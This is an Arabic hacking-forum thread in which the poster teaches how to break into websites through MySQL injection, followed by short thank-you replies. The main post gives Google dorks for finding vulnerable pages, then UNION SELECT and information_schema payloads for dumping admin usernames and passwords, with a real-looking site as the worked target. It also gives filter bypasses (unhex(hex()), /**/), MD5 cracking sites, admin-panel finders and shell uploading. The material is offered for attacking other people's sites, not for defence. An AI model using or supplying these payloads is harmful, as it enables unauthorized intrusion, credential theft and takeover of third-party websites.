|[ دَورتي الخـآصه في إحتراف اختـراق المواقع بـ ثغرة Mysql + شرح مفصل]|مع noureno

|[ دَورتي الخـآصه في إحتراف اختـراق المواقع بـ ثغرة Mysql + شرح مفصل]|مع noureno


النتائج 1 إلى 4 من 4

الموضوع: |[ دَورتي الخـآصه في إحتراف اختـراق المواقع بـ ثغرة Mysql + شرح مفصل]|مع noureno

  1. #1

    Gadid |[ دَورتي الخـآصه في إحتراف اختـراق المواقع بـ ثغرة Mysql + شرح مفصل]|مع noureno

    اخبـآركم

    اليوم إن شاء الله بشرح شرح كآمل مفصل عن ثغرآت سـكيول .. من 0 حتى الاختراق ..

    الشرح بـ يكون كـالتالي :-

    1- :: مقـدمه ::

    -مآ هـو الحقن !؟ وكيف استطيع ان اخترق موقع بواسطته !؟

    - مـآهي الدوركآت وكيف أبحث عنهـا !؟

    2-:: إكتشاف الخطأ في الموقع ::

    3-:: إستخدام أمر order+by لـ استخلاص عدد الأعمده ::

    4-:: إستخدام الأمر union+select لـ تحديد الأعمده المصابه بـ دقه ::

    5-:: إستخدام أمر version() لـ إستخراج نوع قآعده البيآنات [ 4 أو 5 ] ، المزيد ::

    6-:: مفـآهيم اسـآسيه حول إصدآر قـآعده البيآنات تسـآعد على فهم دينآميكيه الإختـراق ::

    7-:: تخطي الفلتره بـ إستخدام الأمر :: unhex(hex())

    8-:: إستخرآج بيآنات الآدمن والبـآسورد بـكل سهولـه في إصدار القواعد [ 5 ] ::

    9-:: فك تشفير بـآسورد الأدمن ::

    10-:: تخـطي الكوكيز وإختراق الموقع ::

    11-:: البحث عن لوحـه التحكم ورَفـع الشل ::

    12-:: تخمين الجدوآل والأعمده في حآله القآعده من الاصدار الـ [ 4 ] ::

    13- :: طريقه تخطي الأصدار 4 ::

    14-:: المشـآكل التي قـد تواجهك عند الحـقن وتخطيهــآ ::

    15-:: خـآتمه ::


    بسم الله وعليه فل يتوكل المؤمنون ..

    1-:: مقـدمـــــه ::

    الكثير منا يعرف ان هنآلك لغات برمجه ... لتصميم المواقع وصفحآت الويب .. مثل لغآت html , j a v a , php ,aspx ,asp

    اللغه التي سنتحدث عنهآ هي لغـه php .. [ أنصحك بـ أخذ خلفيه بسيطه عن الـ بي اتش بي ] قبل البدء في الدرس ..

    أي أن . ملفـآت php هي المعنيه في موضوع الحقن .. وليس اي ملف آخر مثل ملف aspx , asp وغيرهـآ ..
    أكيـد لكل لغه ثغرآتها الخاصه وتطبيق الأوامر المتنآسبه عليها .. ولكنها ليست محور حديثنآ اليوم ..


    -مآ هـو الحقن !؟ وكيف استطيع ان اخترق موقع بواسطته !؟

    الحقن : هو إستغلال الخطأ في قآعده البيآنات وحقنهآ بالأوامر المنآسبه لـ إستخراج المعلومـآت المراده ..

    وتستطيع أن تخترق أي موقع بسهوله اذا وجدت فيه ثغره sql وذلك بـ حصولك على بيآنات المدير .. ودخولك لـ لوحه تحكم الموقع وبالتالي رفـع الشـل .. ومن ثـم الإختراق


    - مـآهي الدوركآت وكيف أبحث عنهـا !؟

    صراحتاً : انا احتج على إسم دوركآت في ثغرات السكيول لمــاذآ !؟

    اقول لك . لـ إن الدورك عبآره جمله [ محدده ] لـ سكربت معين .. مثل inurlowered by infinity

    ولكن .. في ثغرة Mysql هي عبـآره عن ملفآت مركبه على الموقع وليس بالضروره أن تكـون لـ سكربت معين ... أي انها مجرد ملفآت php قـد تظهر عليها فـ مثلاً .. inurl:Mr.Mo0oha.php?id= ليس هذا فقط هو الدورك الذي سـ أبحث عنه طيله مشوآري في الاختراق !!!؟؟

    فقد تـجد أكثر من ملف php يحمـل إسمً آخر غير المذكور [ أعلاه ] .. لذلك وسع مدآركك وإستخدم مخيلتك في البحث عن الملفآت المصابه ..

    خلآصه الكلآم : إنك تقدر تبحث عن أي ملف مو شرط تأخذ دورك معين وتجلس تبحث عليه لاء .. لـ إن الملف الذي سـتبحث عنه هو ملف قد يكون مسماً بـ إسم غير الذي انت معتآد عليه مثل news.php?id

    وهـكذ1

    2-:: إكتشاف الخطأ في الموقع ::

    خـذ نفس عميـق

    كيف نطلع الخطأ في المووقع !؟

    يتم ذلك بـ إضافه رمز غريب على قآعده البيآنات My sql مثل علآمه التنصيص الأحاديه ( ' ) أو ( */ ) أو اخترع رمز تحس إنه غريب وظيفه بعـد الرابط

    ...

    سجل معـي

    إدخل قوقل .. وأكتب [ "=inurl:"topic_detail.php?id ]

    inurl: كـود خآص بالبحث دآخل الـ url < وتعني الرآبـط.
    topic_detail.php = إسم الملف الذي نبحث عنـه

    ?id = نوع المتغير الذي نبـحث عنـه

    " " = تحديد البحث عن topic_detail.php?id= فقـط لاغير ..

    نختـآر موقع من المواقع ونجرب نضيف عليـه رمز غريب مثل '

    وليكن هذا الموقع

    كود PHP:
    http://my w e b invest.com/forum/topic_detail.php?id=1
    بعـد إضافه الرمز يصبح شكل الرآبـط كـ التالي


    كود PHP:
    http://my w e b invest.com/forum/topic_detail.php?id=1'
    أبعـد الفواصل بين كلمـه wَeb

    ويظهـر لدينآ الخطأ



    فكمـآ لاحظت ظهور الخطأ ، فقد يمكن ان توآجهه موقعاً آخراً .. لآيظهر لك الخطأ ، وإنمـآ يتغير شكل الصفحه .. أو يختفي شيئ منهـآ فـ إعلم وَ تيقن أن هذا خـطأ


    وهـكذا نكون أظهرنا الخطأ .. وهو بدآيه الطريـق .. في إختراق الموقع ..




    3-:: إستخدام أمر order+by لـ استخلاص عدد الأعمده ::

    مآهي الأعمـده !؟

    مممم ، نفرض أنهـآ أمآكن مخصصه لحفظ البيآنات ومنها تستطيع أن تدخل على هذا المكآن المخصص وتطلع المطلوب ... وهو كلمه المرور والبـآسورد الخاص بالأدمن . ^_^

    نـرجع لـ حبيبنآ الرابط المصـآب ونبدأ بالتطبيق العملي :-

    كود PHP:
    http://my***invest.com/forum/topic_d...1+order+by+1--
    ++=============== تحـليل الرآبـط ===============++

    topic_detail.php?id=1 > الملف المصـآب .

    + > تستخدم للفصل بين الكلمــآت ..

    +order+by+ > أمر التحقق من سلآمه الأعمده أو اصابتها ..

    1 > العمود المرآد التحقق من صحته وسلآمتـه أو إصابتـه

    -- > لـ إلغاء الإستعلام عن أي امر آخر غير الـ order+by .. يعني تقفل الأمر

    ++=========================================++

    نلآحـظ إن الموقع إختفى منه الخطأ عندما أضفنا العمود 1 ..

    وذلك يدل على إن العمود مصآب .. أي أن العمود اذا لم يكن مصاباً .. ستظل رساله الخطأ ظاهره أمـآمك

    المطلوب الآن تحديد عدد الأعمده المصابه .. لكي يسهل علينـآ عمليه إستخراج البيانات ..

    نضيف العمـود 2 ونتحقق منـه ..

    نفس الشي طلع مصـآب ..

    نظل نضيف حتى تظهر لنـآ رساله خطأ تدل على إن العمود الذي طلبته غير مصـآب

    فـ إذا اضفت العمود 9 .. يظهر لك خطأ .. اذا نستنتج أنَ الأعمده المصابه محصوره من 1-8 [ لـ هذا الموقع ]

    اذاً الأعمده المصابه هي [ 1,2,3,4,5,6,7,8 ] .. كيف نحدد الأعمده المصآبه بـ دقه من بين هذه الأعمده الثمـآنيه ..!!؟

    هذا مآستعرفـه في الفصل الـتآلي ..



    4-:: إستخدام الأمر union+select لـ تحديد الأعمده المصابه بـ دقه ::

    بعد أن تعرفنا على طريقه معرفه إذا كان الموقع مصاباً أم غير مصـاًب .. وعرفنا ايضاً عدد الأعمده المصابه .. تبقى لنـآ أن نـعرف عدد الأعمده المصابه بـ دقه بين هذه الأعمده لـكي نستخرج معلومآت الدخول ..

    كل مآعلينا هو أن نضع الأمر union+select بدلاً عن الأمر order+by لـ يكون شكل الحقنـه كـ التالي

    كود PHP:
    http://my***invest.com/forum/topic_d...,3,4,5,6,7,8--
    ركـز : ) [ --1+union+select+1,2,3,4,5,6,7,8- ]

    أهم شي تضيف قبل الأمر union+select هـذا الرمـز - ليظهر لك الأعمـده المصابه

    وهكـذا نستنج إن الاعمـده المصابه بـ دقه هي 1,4,6

    كيف نكـتشف .. نوع قـآعده البيآنات هل هو 4 أو 5 ...!؟ ... نعرف الطريقـه في الفصـل القـآدم ..


    5-:: إستخدام أمر version() لـ إستخراج نوع قآعده البيآنات [ 4 أو 5 ] ، المزيد ::

    إذاً .. ، لَقـد إكتشفنا عدد الأعمده المصـآبه وهـي 1,4,6 .. تبـقى لنـآ أن نستخرج نوع قـآعده البيـآنات هل هل هي من الإصدار الخـآمس أم من الإصـدار .. الرابـع .

    سـ تسألني : وما الفرق إذا كان الاصدار للقآعده هو خمسـه أم كآن أربـعه !؟

    أجيبك : عندمـآ تكون القـآعده من الاصدار الخـآمس يسهل علينـآ أمر استخراج البيـآنات بسهوله كبيره جـداً .. عكس الإصـدار الرآبع .. وستعرف ذلك أكثـر فيمـآ بعـد ..

    الآن نـأتي إلى استخراج إصدار قـآعده البيـآنات وذلك بـ إستبـدال العمـود المصاب [ 1 أو 4 أو 6 ] بـ الأمر

    ()version أو version@@

    نـأتي إلى التطبيق ونلآحـظ شكل الرآبـط يكون كـ التالي :-

    كود PHP:
    http://my***invest.com/forum/topic_d...on(),5,6,7,8--
    وينتج عن الحقنـه هاذي .. ظهور نوع القـآعده وهي من الإصدار الخـآمس 5.0.81-community

    أيضاً ، تستطيع إستخدام هذه الأوامر لـ إستخراج معلومآت عامه عن القـآعده .

    مثل :-

    كود:

    database()
    لمعرفـه إسم قاعده البيآنات

    user n a m e()

    أبعـد المسآفات من كلمه n a m e

    لمعرفـه إسم مستخدم قـآعده البيآنات

    وهنآك المزيد من الأوامر .. ولكنـهآ ليست مهمـه .

    5-:: مفـآهيم اسـآسيه حول إصدآر قـآعده البيآنات تسـآعد على فهم دينآميكيه الإختـراق ::

    :: في حـآل إصدار قـآعده البيآنات 5 .. يمكنك عمل الآتي :-

    إستخدام قـآعده البيآنات الافتراضيه information_schema وإستخراج أسماء الجدوال والأعمـده .. وبالتـآلي الحصول على البيـآنات المطلوبه ..

    :: في حـآل إصدار قـآعده البيآنات 4 :-

    لآيمكنك إستخدام قـآعده البيآنات الافتراضيه information_schema وبـالتالي لآتستطيع إستخراج إسم الجدآول والأعمـده .. إذاً لآتستطيع إستخراج البيـآنات المطلوبه ..





    6-:: تخطي الفلتره بـ إستخدام الأمر ((unhex(hex

    الحـل بكل بسـآطه هـو إستخدام الأمر ((!)unhex(hex

    مكـآن علآمـه التعجب تحـط الأمر الذي تريد ان تستعرضـه .. وليكن version()

    أتـرك التطبيق لك عزيزي القـآرئ : )

    كيف أستخرج بيـآنات الآدمن والبـاسورد !؟ ومآهي الأوامر الخـآصه بذلك !؟ ... سنتعرف عليه في الفصـل القـآدم



    7-:: إستخرآج بيآنات الآدمن والبـآسورد بـكل سهولـه في إصدار القواعد [ 5 ] ::

    وصلنـآ إلى أهـم فصل وهو إستخـرآج البيآنات المطلوبه من حقن قوآعد البيـآنات Mysql وهي بيـآنات الدخول لـ لوحه التحكم .. أي بيـآنـآت الآدمـن .

    طيب ، شوف شكل الرآبـط هذا وبعدين نحلل الرآبـط كلاً على حِـده :-

    كود PHP:
    http://my***invest.com/forum/topic_d...,7,8+from+info
    rmation_schema.tables+where+table_schema =database()--
    حـط بدل الـ **** كلمـه n a m e بـدون مسآفات ... لـ إن المنتدى مشفر فيـه بعض الكلمـآت
    يظهـر لنـآ النآتج كمـآ في الصوره :-
    group_concat(table_n a m e) > هذا الأمر نضعـه بدلاً عن العمـود المصـآب وليكن العمود 4 .


    ++================ تحليل الرآبــط ==================++

    group > تفيد التجميـع .. أي تجميع كل الطآولات وإظهـآرها كامله

    concat > يستخدم للربـط بين أمرين .. وسنعرف كيف يتم ذلك لآحقـاً.

    table_n a m e > وتعني إسم الجـدول .. نضعه مثل مآهو ولآنعـدل عليه .. الا فيمـآ بعد : )

    ++==========================================++

    --()from+information_schema.tables+where+table_schem a =database+

    ++==================تحليل الرآبـــط ==============++

    + > كمآ قلت سابقـاً تستعمل للفصل بين الأوامـر ..

    from > تعني باللغـه الإنجليزيه [ مِـن ] .. وهي كـ أمر ..[ إسحب إسم الجدول ] .. مِـن

    information_schema.tables > قـآعده البيآنات الافتراضيه التي توفرهـآ لنا قآعده البيآنات 5 .. وهي مرتبـطه بالأمر from .. كـ أننا نقول [ إسحب اسم الجـدول من قـآعده البيانات الافتراضيه للجدآول ] = from+information_schema.tables

    where > تعني بالإنجليزيه [ أيـن ] .. كـ أننا نقول لـ قاعده البيآنات [ أين إسم الجدول ] ..

    table_schema > وتعني بالإنجليزيه [ مخطط الجدآول ] .. أي قائمه الجدآول ومنها يتم إرشـآد المخطط إلى قـآعده البيآنات ..

    ()database > وتعني قآعده البيـآنات , ومنهـآ يتم إستخراج كـآفه البيآنات المطلوبه ..

    -- > كمـآ أسلفت يستخدم هذا الرمـز في إيقاف أي استعلآم [ طلب ] آخر غير الذي طلبنآه ...

    ++=============================================++



    إذاً .. نتج لدينـآ من هذه الحقنـه .. عـده جدآول . المطلوب هنـآ هو جدول الـ آدمن وهو admin

    وقياساً عليه .. يمكنك إستخراج جدول أي أدمن .. من موآقع أخرى مصـآبه .


    تبقى لـدينـآ .. أن نستخرج أسماء الأعمــده .. وكلمـه عمود تعني بالإنجليزيه column

    مـآذا سنصنـع .. لـ إستخراج الأعمــده !؟ فــكر ملياً !؟ ....... نـعم هذا صحيح . سنستبدل كلمه table بـ كلمه Column ..

    تمـعن عزيزي القـآرئ في هذا الرآبــط :-

    كود PHP:
    http://my***invest.com/forum/topic_d...oncat(column_n a m e),5,6,7,8+from+information_schema.columns+where+t able_schema =database()--
    حـط n a m e بـدون فوآصل

    تلآحـظ أننا إستبدلنا كل كلمه table بـ كلمه Column

    عـدا table_schema فـهي لآتستبدل


    نلآحـظ عدد من أسماء الأعمـده التي ظهـرت .

    وهي كـ التالي :-

    كود:

    admin_****,email,state,user****,admin_password,log in_verified,admin_id,comm_id,amount,description,da te,set_id,set_****,set_value,banner_id,banner_url, site_url,plan_id,payment_thro,status,plan_id,plan_ ****,plan_description,cost,clicks_assured,comment_ id,member_id,article_id,subject,comments,email,id, email,article_id,category_id,posted_by,po

    أهمهـآ هي المحدده في الصـوره ..


    الخـطوه الأخيره بعد أن استنتجنـآ الجدول والأعمـده الخـآصه بـ بيآنات مدير الموقع ..

    نطبق الآن لـ إستخراج البيآنات التي نستطيع الدخول منهـآ على لوحه التحكم ...

    لآحـظ الرآبـط :-

    كود PHP:

    http://my***invest.com/forum/topic_d...8+from+admin--
    حـط بدل **** كلمه n a m e بـدون مسافات ..

    ++===================== تحليل الرآبــــــط ==================++

    concat > كمآ أسلفت ذكراً ... هو أمر يرآد به الربط بين أمرين .. وهمـآ admin_**** , admin_password

    0x3a3a > هي تشفيره بـ الهيكس وتعنـي هذا الرمـز :: ويستخدم لـ جمع أمرين

    from+admin-- > ويعـني . [ إستخرج بيآنات الأعمـده admin_**** , admin_password من الجدول admin ] ..

    ++================================================ ==++


    هـآ قد وصلنـآ إلى نهايه الحقـن ... وإستخرجنـآ البيآنات المطلوبه .

    لآحـظت أن البـآسورد غريب نوعاً ما !؟ هل هذا تشفير !؟ ومآهو نوع هذا التشفير !؟ وهل استطيع ان افك هذ االتشفير !؟ ... اسأله نجـيب عنهـآ في الفصل القــآدم ..



    10-:: فك تشفير بـآسورد الأدمن ::

    لعل أكثـر مآقد يواجهك عند حقنـك لـ اغلب المواقع .. أنك تجد الباسورد مشفراً بنظآم تشغير Md5 وهي أكثر الهـآشات التي قد تجدها عند حقنك للموآقــع ..

    وتستطيع أن تفك تشفيرهـآ بعده برآمج منهـآ cain أو برنـآمج قوس قزح ..

    وأيضاً ، تستطيعُ أن تفك تشفير هـآشات الـ md5

    عن طريق الموآقع مباشرةً

    وهذه أهـم المواقع لفك هذا النوع من الـهـآشات :-

    كود:

    milw0rm.com
    gdataonline.com
    hashkiller.com
    csthis.com
    crysm.net
    rednoize.com
    md5decrypter.com
    hashreverse.com
    cryptobitch.de
    hashchecker.com
    securitystats.com
    neeao.com
    xpzone.de

    ولكن مـآذا إن لم يكن الهـاش من نوع md5 !؟

    تستطيع التمييز بين أنـواع الهـآشات وذلك من خلآل الموضوع التـالي :-

    كود PHP:
    http://v4-team.com/cc/showthread.php?p=383923

    10-:: تخـطي الكوكيز وإختراق الموقع ::

    شـآهد هذا الفيديو من عمـل صديقي العزيز شـآجع

    [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]

    إذاً .... لقـد وجدت المعلومآت التي تدخلني إلى لوحه التحكم .. ولكن أين سـ أجد لوحه التحكم !؟ ومآهو مسآرها !؟ وهل سـ أستطيع رفع شل عليهـآ !؟ .. اسأله نجيب عنهـآ في الجزء التـآلي


    11-:: البحث عن لوحـه التحكم ورَفـع الشل ::

    تستطيع عزيزي القـارئ .. ان تخمن مسـآرات لوحه التحـكم المعتآده عند أصحـآب المواقع ..

    أيضاً ، تـوجد عـده برآمـج تمكنك من فحـص ملفـآت الموقع وبالتالي معرفه مسـآر لوحه التحكم .. ولعل من أهم هذه البـرآمج .. برنـآمج intelltempar

    كمـآ توجد برآمج أخرى مثل برنآمج Admin Finder وغيرهـآ الكثير .. عليك بالبحث و الممارسه

    و أريـد أن اُنَوِه إلى خطـأ يقع فيه أكثر المخترقين بثغرآت السكيول عند البحث عن لوحه التحكم .. فقد يجدهآ أمام نآظريه .. ولكنـه يقع في العجله وعـدم الفهم .. لذلك يضيع على نفسه الوقت والإختراق

    فـ مثلاً في هذا الموقع الذي طبقنـآ عليه ..

    كود PHP:
    http://my***invest.com/forum/topic_detail.php?id=1
    تجد أن امكآنيه الدخول متآحه امـآمك !؟ ولكن البعض يقع في الخطأ ويبحث عن لوحه التحكم وهي فعـلاً أمـآم ناظريه .

    كمـآ أن هناك انواع للوحآت التحكم فليس كلاً منهـآ يمكنك من رفع شـل !؟ فبعضها تكون خصائصها محدوده .. وبعضها تكون خصآئصها غير محدوده ..


    إلى هنـآ نكون قد أكملنـآ طريقه الأختراق بـ إستغلال ثغرات Mysql في أصدارات القواعد 5 .. ولكن ماذا إن كان إصدار القآعده 4 !؟ هل نستطيع أختراق هذا النوع !؟ وهل نستطيع تخطيه !؟

    12-:: في حـآل كان إصـدار قاعده البيـآنات 4 ::

    نلجأ في هذه الحآله إلى التخمين .. بحيث نخمن الجدآول والأعمـده لـ إستخراج بيـآنات الآدمـن .

    هنآك العديد من المواضيع التي تتحدث عن أسماء الجداول والأعمـده

    فقط عليك أن تخمن الجدول .. مثلاً تخمن أن يكون الجدول هو Admin او login .. وهكـذا

    والأعمـده مثلاً تخمن ان تكون user n a m e أو password .. وَعليهِ قـِـس ..



    13- :: طريقه تخطي الأصدار 4 ::

    يمكنك تخـطي الأصدار الرآبـع .. بهذه الطريقه وهي كـ التالي :-

    لنفرض إنك واجهت مشكله مع أحـد المواقع .

    فبعـد أن قمت بحقنه إستنتجت أن إصدار القـآعده هو 4

    أمـآمك طريقين .. أمـآ انك تخمن الجدول والأعمـده .. أو .. تبحث عن نفس الملف المصـآب ولكن في موقع آخر يحمل إصدار 5 .. وإستخراج إسم الجدول والأعمـده ومطآبقه النتآئج التي حصلت عليها من حقن الموقع صآحب الاصدار 5 مع الموقع صـآحب الاصدار 4

    نسبه نجآح الطريقه 50 %



    طيب انـآ طبقت مثل شرحك ... وعملك كل شي بالحرف الوآحـد .. ولكن لم تظهر لي الأعمـده !؟ وأيضاً .. تظهر لي أخطـآ !؟ مآهو الحـل !؟ ...

    نتعرف على أهـم المشاكل وحلولهـآ في الفصلين الأخيرين .


    14-:: المشـآكل التي قـد تواجهك عند الحـقن وتخطيهـآ ::

    قــد توآجهك عده مشآكل بمـآ أنـك مبتدئ .. وقد تكون هذه المشآكل .. نقص حرف في حقنه الإستغلال .. أو نقص علآمه .. فـ مثلاً .. في هـذا الرابـط ..

    كود PHP:
    http://my***invest.com/forum/topic_d...ion+select+1,2,3group_concat(column_****),5,6,7,8+from+information_ schema.columns+where+table_schema =database()--
    لآحظ وجود خـطأ !؟ لمـــآذ1 !؟ ..... نـعم هذا صحيح .. : ) لقد نسينآ إضافه فـآصله قبل الأمر group_concat

    وَعليـهِ قـِـس

    أي انهـآ مجرد اخطاء عآديه قد توآجهك كـ مبتدأ .. بسبب نقصآن شي في الحقنـه .


    أمـآ النوع الثـآني الذي قد يوآجهك .. هو الفلـتره للموآقع .. ومنع الأستعلام بالأوامر مثل أمـر union+select



    هنـآ أصحاب السرفرآت يستخدمون الفلتره لـ منع الإستعلام بـ أوامر محدده مثل union+select

    فـ كيف نستطيع أن نتخطى هذه الفلـتره !؟

    يكون ذلك بـ إستبدآل علآمـه + بـ هذا الـرمز /**/

    وإستمتع بالتخـطي



    15-:: خـآتـــمه ::


    في نهـآيه المطــاف ... أتمنى لكم مزيداً من التقدم والنجـــآح ... وليس هذا إلا مدخلاً لـ عالم الـ mysql فـ هذه اللغه وثغرآتهــآ عميـقه .. وقويـه في نفس الوقت .. فـ لآتنسوا أن قوقل تم إختراقه بثغرآت سكيول ، ولكـن بـ شكل متطور .. وليس كمـآ في الشرح [ أعلاه ] .

    كمـآ ، وأستحلفك بالله عزيزي القــارئ عـدم إستخدام مآتعلمته .. في إختراق أخوانك المسلمين

    لآ أرجو منكم .. الا دعوه في ظهـر الغيب .. تنفعني في دنيآي وآخرتي

    وهاذا دائما مع noureno

    كما يشرفني التواصل مع أعضاء الهكر في الفيس بوك: [email protected]

  2. #2

    افتراضي رد: |[ دَورتي الخـآصه في إحتراف اختـراق المواقع بـ ثغرة Mysql + شرح مفصل]|مع noureno

    مشكور موضوع جميل

  3. #3

    افتراضي رد: |[ دَورتي الخـآصه في إحتراف اختـراق المواقع بـ ثغرة Mysql + شرح مفصل]|مع noureno

    مشكككككككككككككور

  4. #4

    افتراضي رد: |[ دَورتي الخـآصه في إحتراف اختـراق المواقع بـ ثغرة Mysql + شرح مفصل]|مع noureno

    يعطيك العافية اخي صراحة موضوعك بحد ذاته دورة دقيقة أحييك على المجهوود وشكرآ

المواضيع المتشابهه

  1. شرح إستخدام ثغرة سهلة جدا لإختراق المواقع
    بواسطة fayzoun في المنتدى قسم الثغرات
    مشاركات: 37
    آخر مشاركة: 09-08-2012, 02:53 PM
  2. ثغرة لإختراق المواقع.
    بواسطة noureno-rca في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 4
    آخر مشاركة: 09-08-2012, 01:27 PM
  3. ثغرة اختراق المواقع
    بواسطة حسن البغدادي في المنتدى قسم الثغرات
    مشاركات: 5
    آخر مشاركة: 02-05-2011, 07:47 PM
  4. معنى المواقع المصابة بالحقن / ثغرة sql /
    بواسطة tarik_leking في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 2
    آخر مشاركة: 09-30-2010, 03:11 AM
  5. شرح ثغرة سكريبت لاختراق المواقع بالفيديو
    بواسطة galylof في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 01-04-2010, 01:43 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •